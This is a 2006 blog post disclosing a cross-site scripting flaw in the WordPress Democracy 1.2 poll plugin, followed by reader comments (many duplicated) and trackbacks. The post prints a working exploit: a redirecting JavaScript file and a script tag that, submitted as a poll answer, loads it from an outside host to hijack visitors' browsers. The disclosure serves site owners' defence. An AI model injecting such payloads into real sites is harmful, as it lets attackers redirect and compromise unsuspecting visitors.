Technosailor.com Readers! Donate today to assist the Partners in Health Haiti Relief in their efforts.

22 September 2006 98 Comments

Democracy Plugin XSS Vulnerability ALERT

Last week, Darren McLaughlin scooped a story regarding the very popular Democracy plugin for Wordpress. You can read his findings about how the execution of the plugin may cause all of your sites pages to be dropped from search engine indexes.

When it rains it pours because last week, we discovered an XSS exploit in the plugin that can cause a website to be hijacked. To be clear, we discovered this because one of our b5media blogs was in fact hijacked. While in our case, the hack was not malicious and actually redirected the site to Google, the truth is that by exploiting this plugin, a malicious hacker could redirect a website to any website that could execute any malicious code and compromise security. It affects btoh Firefox and Internet Explorer. PLEASE TAKE THIS WARNING SERIOUSLY!

I have alerted the plugin author who has responded positively and promises a new version of Democracy 2.0, however I warned him that he had one week until I released details of the exploit. Andrew has just posted Democracy Public Beta 2. Cannot vouch for its security yet as it has literally just now been posted. Prelimnary testing indicates it’s okay though.

How To Exploit the Democracy 1.2 XSS Vulnerability

This is not a complex exploit.

I have created a javascript file called examplehack.js and placed it on my webserver. It simply redirects to a standard HTML page with a message. This could be any page containing any scripting.

1
window.location = "http://www.technosailor.com/examplehack.html"

To exploit the plugin, the blog owner must have a poll that allows user contributed answers. Simply “Adding an answer” with the following code (sample) will create a hijacked browser:

1
<script src=http://technosailor/examplehack.js>test</script>

poll.png

Refresh and watch traffic get siphoned away.

Originally discovered by Duncan Riley.

Pick up your copy of the WordPress Bible, a wildly popular resource for beginners and experts alike.

Written by Aaron Brazell on September 22, 2006

Popularity: 1% [?]

Tags: , , ,

98 Responses to “Democracy Plugin XSS Vulnerability ALERT”

  1. drmike 23 September 2006 at 10:34 am #

    Podz: Don’t forget all those people over on the wp.com forums who keep saying that javascripts, embed, and object tags are safe as well. :)

  2. drmike 23 September 2006 at 10:34 am #

    Podz: Don’t forget all those people over on the wp.com forums who keep saying that javascripts, embed, and object tags are safe as well. :)

  3. drmike 23 September 2006 at 10:34 am #

    Podz: Don’t forget all those people over on the wp.com forums who keep saying that javascripts, embed, and object tags are safe as well. :)

  4. drmike 23 September 2006 at 10:34 am #

    Podz: Don’t forget all those people over on the wp.com forums who keep saying that javascripts, embed, and object tags are safe as well. :)

  5. drmike 23 September 2006 at 10:34 am #

    Podz: Don’t forget all those people over on the wp.com forums who keep saying that javascripts, embed, and object tags are safe as well. :)

  6. podz 23 September 2006 at 10:46 am #

    drmike – I wasn’t saying they were safe. I’m talking about people who can code saying that other code is unsafe.

    I’ve a challenge. If it will be accepted.

  7. podz 23 September 2006 at 10:46 am #

    drmike – I wasn’t saying they were safe. I’m talking about people who can code saying that other code is unsafe.

    I’ve a challenge. If it will be accepted.

  8. podz 23 September 2006 at 10:46 am #

    drmike – I wasn’t saying they were safe. I’m talking about people who can code saying that other code is unsafe.

    I’ve a challenge. If it will be accepted.

  9. podz 23 September 2006 at 10:46 am #

    drmike – I wasn’t saying they were safe. I’m talking about people who can code saying that other code is unsafe.

    I’ve a challenge. If it will be accepted.

  10. podz 23 September 2006 at 10:46 am #

    drmike – I wasn’t saying they were safe. I’m talking about people who can code saying that other code is unsafe.

    I’ve a challenge. If it will be accepted.

  11. Leroy Brown 25 September 2006 at 8:58 am #

    It’s a shame that it always takes the public posting of the exploit for the author to fix the problem. Although I can’t be too hard on someone who creates a plugin at no cost, so I don’t know. Mixed feelings as usual.
    Can you hold the author liable for any problems, even though his software is free? I’m not sure that it’s fair to do so.

  12. Aaron Brazell 25 September 2006 at 9:40 am #

    Leroy: Technically, no you can’t hold an author liable. In reality though, he’s liable. That’s how anyone who would get exploited would feel. That’s how I would feel if I was hacked as a result. Fortunately, I was able to post the exploit with a link to a new version, so I’d like to think that I worked with Andrew to find a solution before it blew up.

  13. Leroy Brown 25 September 2006 at 8:58 am #

    It’s a shame that it always takes the public posting of the exploit for the author to fix the problem. Although I can’t be too hard on someone who creates a plugin at no cost, so I don’t know. Mixed feelings as usual.
    Can you hold the author liable for any problems, even though his software is free? I’m not sure that it’s fair to do so.

  14. Leroy Brown 25 September 2006 at 8:58 am #

    It’s a shame that it always takes the public posting of the exploit for the author to fix the problem. Although I can’t be too hard on someone who creates a plugin at no cost, so I don’t know. Mixed feelings as usual.
    Can you hold the author liable for any problems, even though his software is free? I’m not sure that it’s fair to do so.

  15. Leroy Brown 25 September 2006 at 8:58 am #

    It’s a shame that it always takes the public posting of the exploit for the author to fix the problem. Although I can’t be too hard on someone who creates a plugin at no cost, so I don’t know. Mixed feelings as usual.
    Can you hold the author liable for any problems, even though his software is free? I’m not sure that it’s fair to do so.

  16. Leroy Brown 25 September 2006 at 8:58 am #

    It’s a shame that it always takes the public posting of the exploit for the author to fix the problem. Although I can’t be too hard on someone who creates a plugin at no cost, so I don’t know. Mixed feelings as usual.
    Can you hold the author liable for any problems, even though his software is free? I’m not sure that it’s fair to do so.

  17. Leroy Brown 25 September 2006 at 8:58 am #

    It’s a shame that it always takes the public posting of the exploit for the author to fix the problem. Although I can’t be too hard on someone who creates a plugin at no cost, so I don’t know. Mixed feelings as usual.
    Can you hold the author liable for any problems, even though his software is free? I’m not sure that it’s fair to do so.

  18. Aaron Brazell 25 September 2006 at 9:40 am #

    Leroy: Technically, no you can’t hold an author liable. In reality though, he’s liable. That’s how anyone who would get exploited would feel. That’s how I would feel if I was hacked as a result. Fortunately, I was able to post the exploit with a link to a new version, so I’d like to think that I worked with Andrew to find a solution before it blew up.

  19. Aaron Brazell 25 September 2006 at 9:40 am #

    Leroy: Technically, no you can’t hold an author liable. In reality though, he’s liable. That’s how anyone who would get exploited would feel. That’s how I would feel if I was hacked as a result. Fortunately, I was able to post the exploit with a link to a new version, so I’d like to think that I worked with Andrew to find a solution before it blew up.

  20. Aaron Brazell 25 September 2006 at 9:40 am #

    Leroy: Technically, no you can’t hold an author liable. In reality though, he’s liable. That’s how anyone who would get exploited would feel. That’s how I would feel if I was hacked as a result. Fortunately, I was able to post the exploit with a link to a new version, so I’d like to think that I worked with Andrew to find a solution before it blew up.

  21. Aaron Brazell 25 September 2006 at 9:40 am #

    Leroy: Technically, no you can’t hold an author liable. In reality though, he’s liable. That’s how anyone who would get exploited would feel. That’s how I would feel if I was hacked as a result. Fortunately, I was able to post the exploit with a link to a new version, so I’d like to think that I worked with Andrew to find a solution before it blew up.

  22. Aaron Brazell 25 September 2006 at 9:40 am #

    Leroy: Technically, no you can’t hold an author liable. In reality though, he’s liable. That’s how anyone who would get exploited would feel. That’s how I would feel if I was hacked as a result. Fortunately, I was able to post the exploit with a link to a new version, so I’d like to think that I worked with Andrew to find a solution before it blew up.

  23. Leroy Brown 25 September 2006 at 1:25 pm #

    Aaron,
    I may feel differently if one of my sites had been hacked – that’ll certainly give you a different perspective on the matter. Either way, it’s necessary to post the expoit so that a fix can be produced, whether by the author or someone else. Good to see that the author did come up with a fix, so that people had a solution instead of a freak-out period of waiting.

  24. Leroy Brown 25 September 2006 at 1:25 pm #

    Aaron,
    I may feel differently if one of my sites had been hacked – that’ll certainly give you a different perspective on the matter. Either way, it’s necessary to post the expoit so that a fix can be produced, whether by the author or someone else. Good to see that the author did come up with a fix, so that people had a solution instead of a freak-out period of waiting.

  25. Leroy Brown 25 September 2006 at 1:25 pm #

    Aaron,
    I may feel differently if one of my sites had been hacked – that’ll certainly give you a different perspective on the matter. Either way, it’s necessary to post the expoit so that a fix can be produced, whether by the author or someone else. Good to see that the author did come up with a fix, so that people had a solution instead of a freak-out period of waiting.

  26. Leroy Brown 25 September 2006 at 1:25 pm #

    Aaron,
    I may feel differently if one of my sites had been hacked – that’ll certainly give you a different perspective on the matter. Either way, it’s necessary to post the expoit so that a fix can be produced, whether by the author or someone else. Good to see that the author did come up with a fix, so that people had a solution instead of a freak-out period of waiting.

  27. Leroy Brown 25 September 2006 at 1:25 pm #

    Aaron,
    I may feel differently if one of my sites had been hacked – that’ll certainly give you a different perspective on the matter. Either way, it’s necessary to post the expoit so that a fix can be produced, whether by the author or someone else. Good to see that the author did come up with a fix, so that people had a solution instead of a freak-out period of waiting.

  28. Leroy Brown 25 September 2006 at 1:25 pm #

    Aaron,
    I may feel differently if one of my sites had been hacked – that’ll certainly give you a different perspective on the matter. Either way, it’s necessary to post the expoit so that a fix can be produced, whether by the author or someone else. Good to see that the author did come up with a fix, so that people had a solution instead of a freak-out period of waiting.

  29. MustLive 26 September 2006 at 6:03 pm #

    Aaron. As I wrote at my site http://websecurity.com.ua/187/ two weeks ago, I was found a vulnerability in Subscribe To Comments WordPress plugin (and already released the path and plugin developer also worked on next version of plugin). So there are many other cases (among WordPress plugins) with plugin’s vulnerabilities, not only in Democracy plugin. And as I see, you also use Subscribe To Comments at your site, so you need to draw attention to this information (and check your plugin).

  30. MustLive 26 September 2006 at 6:30 pm #

    Aaron. You have already validated my message and then I retrieved my “key” (it need for your version of wp-subscription-manager.php). And after looking to one of the vulnerable scripts (in this case – wp-subscription-manager.php), I can tell you that your site is vulnerable (via Subscribe To Comments plugin)!

    You need to update plugin. You can take Subscribe To Comments 2.0.5 from my MustLive Security Pack v.1.0.4 or download last version (Subscribe To Comments 2.0.8) from developer’s site.

  31. MustLive 26 September 2006 at 6:03 pm #

    Aaron. As I wrote at my site http://websecurity.com.ua/187/ two weeks ago, I was found a vulnerability in Subscribe To Comments WordPress plugin (and already released the path and plugin developer also worked on next version of plugin). So there are many other cases (among WordPress plugins) with plugin’s vulnerabilities, not only in Democracy plugin. And as I see, you also use Subscribe To Comments at your site, so you need to draw attention to this information (and check your plugin).

  32. MustLive 26 September 2006 at 6:03 pm #

    Aaron. As I wrote at my site http://websecurity.com.ua/187/ two weeks ago, I was found a vulnerability in Subscribe To Comments WordPress plugin (and already released the path and plugin developer also worked on next version of plugin). So there are many other cases (among WordPress plugins) with plugin’s vulnerabilities, not only in Democracy plugin. And as I see, you also use Subscribe To Comments at your site, so you need to draw attention to this information (and check your plugin).

  33. MustLive 26 September 2006 at 6:03 pm #

    Aaron. As I wrote at my site http://websecurity.com.ua/187/ two weeks ago, I was found a vulnerability in Subscribe To Comments WordPress plugin (and already released the path and plugin developer also worked on next version of plugin). So there are many other cases (among WordPress plugins) with plugin’s vulnerabilities, not only in Democracy plugin. And as I see, you also use Subscribe To Comments at your site, so you need to draw attention to this information (and check your plugin).

  34. MustLive 26 September 2006 at 6:03 pm #

    Aaron. As I wrote at my site http://websecurity.com.ua/187/ two weeks ago, I was found a vulnerability in Subscribe To Comments WordPress plugin (and already released the path and plugin developer also worked on next version of plugin). So there are many other cases (among WordPress plugins) with plugin’s vulnerabilities, not only in Democracy plugin. And as I see, you also use Subscribe To Comments at your site, so you need to draw attention to this information (and check your plugin).

  35. MustLive 26 September 2006 at 6:03 pm #

    Aaron. As I wrote at my site http://websecurity.com.ua/187/ two weeks ago, I was found a vulnerability in Subscribe To Comments WordPress plugin (and already released the path and plugin developer also worked on next version of plugin). So there are many other cases (among WordPress plugins) with plugin’s vulnerabilities, not only in Democracy plugin. And as I see, you also use Subscribe To Comments at your site, so you need to draw attention to this information (and check your plugin).

  36. MustLive 26 September 2006 at 6:30 pm #

    Aaron. You have already validated my message and then I retrieved my “key” (it need for your version of wp-subscription-manager.php). And after looking to one of the vulnerable scripts (in this case – wp-subscription-manager.php), I can tell you that your site is vulnerable (via Subscribe To Comments plugin)!

    You need to update plugin. You can take Subscribe To Comments 2.0.5 from my MustLive Security Pack v.1.0.4 or download last version (Subscribe To Comments 2.0.8) from developer’s site.

  37. MustLive 26 September 2006 at 6:30 pm #

    Aaron. You have already validated my message and then I retrieved my “key” (it need for your version of wp-subscription-manager.php). And after looking to one of the vulnerable scripts (in this case – wp-subscription-manager.php), I can tell you that your site is vulnerable (via Subscribe To Comments plugin)!

    You need to update plugin. You can take Subscribe To Comments 2.0.5 from my MustLive Security Pack v.1.0.4 or download last version (Subscribe To Comments 2.0.8) from developer’s site.

  38. MustLive 26 September 2006 at 6:30 pm #

    Aaron. You have already validated my message and then I retrieved my “key” (it need for your version of wp-subscription-manager.php). And after looking to one of the vulnerable scripts (in this case – wp-subscription-manager.php), I can tell you that your site is vulnerable (via Subscribe To Comments plugin)!

    You need to update plugin. You can take Subscribe To Comments 2.0.5 from my MustLive Security Pack v.1.0.4 or download last version (Subscribe To Comments 2.0.8) from developer’s site.

  39. MustLive 26 September 2006 at 6:30 pm #

    Aaron. You have already validated my message and then I retrieved my “key” (it need for your version of wp-subscription-manager.php). And after looking to one of the vulnerable scripts (in this case – wp-subscription-manager.php), I can tell you that your site is vulnerable (via Subscribe To Comments plugin)!

    You need to update plugin. You can take Subscribe To Comments 2.0.5 from my MustLive Security Pack v.1.0.4 or download last version (Subscribe To Comments 2.0.8) from developer’s site.

  40. MustLive 26 September 2006 at 6:30 pm #

    Aaron. You have already validated my message and then I retrieved my “key” (it need for your version of wp-subscription-manager.php). And after looking to one of the vulnerable scripts (in this case – wp-subscription-manager.php), I can tell you that your site is vulnerable (via Subscribe To Comments plugin)!

    You need to update plugin. You can take Subscribe To Comments 2.0.5 from my MustLive Security Pack v.1.0.4 or download last version (Subscribe To Comments 2.0.8) from developer’s site.

« Older Comments

Trackbacks/Pingbacks.

  1. What makes you happy ? » Plugins….. - 22. Sep, 2006

    [...] Aaron Brazell has posted that a certain WP plugin has a vulnerability. The plugin has been fixed and a new release is here. I commented over there twice and asked what I consider to be two fair questions. I was subscribed to the comments so returned when some were made. This comment sticks out: These plugins can be very dangerous. I think the Wordpress culture is to install as many plugins as possible without doing a ton of research. [...]
  2. WordPress Democracy Plugin Exploit (and a New Version) at The Blog Herald - 22. Sep, 2006

    [...] Blog Software Sep 22 at 9:17 pm by Aaron Brazell -Matt told me to cross post this when I went live with this story. Earlier this evening, I released the details of a cross site scripting exploit in the super popular Democracy 1.2 plugin. Read about the exploit here. [...]
  3. Understanding Implications of WordPress Plugin Security » Technology, Blogging and New Media - 23. Sep, 2006

    [...] Yesterday, I posted details about a cross-site scripting (XSS) exploit in a popular WordPress plugin which prompted Podz, support maven for WordPress to challenge the WordPress development community to contribute back to the community by detailing what makes plugins unsafe. [...]
  4. ha.ckers.org web application security lab - Archive » XSS Vulnerability in Democracy Wordpress Plugin - 23. Sep, 2006

    [...] Aaron Brazell just published an interesting post talking about a cross site scripting vulnerability in the democracy plugin for Wordpress. Almost immediately after posting Democracy published a fix to the vulnerability. This is a pretty interesting flaw that I think needs a little more discussion. [...]
  5. Confusing Digg » Technology, Blogging and New Media - 25. Sep, 2006

    [...] 40 people have Dugg the story at this writing (you can vote now right from the entry) but not enough Diggers – that is, I had a bunch of people Digg the article with the hopes of boosting the story profile, but I don’t know enough people who have a high enough profile using Digg to make it matter. I probably need another 40 to make it to the front page at this point. That’s okay though. [...]
  6. How to Handle Security Flaws » Technology, Blogging and New Media - 05. Jan, 2007

    [...] the vendor to provide a patch or a new version. I demonstrated this process when I reported the XSS flaw in the Democracy 1.2 plugin for WordPress. I alerted the plugin author, gave him an opportunity to provide a fixed [...]
  7. The Secret Truth About The Plugins Security » Inspiration Bit - 03. Mar, 2007

    [...] by redirecting every user to a different website. Aaron Brazell from Technosailor posted all details about the flaws in the plugin. Fortunately the plugin’s author has already fixed the code and [...]
  8. BlogSecurity » WordPress BlogWatch - 26. Jul, 2007

    [...] XSS Vulnerability (more) [...]